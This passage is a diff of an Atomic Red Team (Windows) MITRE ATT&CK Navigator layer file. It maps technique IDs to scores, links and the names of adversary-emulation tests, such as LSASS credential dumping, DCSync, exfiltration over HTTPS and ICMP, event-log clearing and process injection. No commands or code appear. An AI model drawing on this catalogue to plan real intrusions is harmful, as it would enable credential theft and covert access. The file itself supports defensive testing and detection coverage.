Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]}]}
\ No newline at end of file
+{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":37,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":12,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":1,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":3,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":1,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1033","score":5,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":4,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":1,"enabled":true,"comment":"\n- C2 Data Exfiltration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":9,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":1,"enabled":true,"comment":"\n- Process Injection via C#\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":2,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":32,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Obfuscation Tests\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- PowerShell Downgrade Attack\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":5,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":17,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- 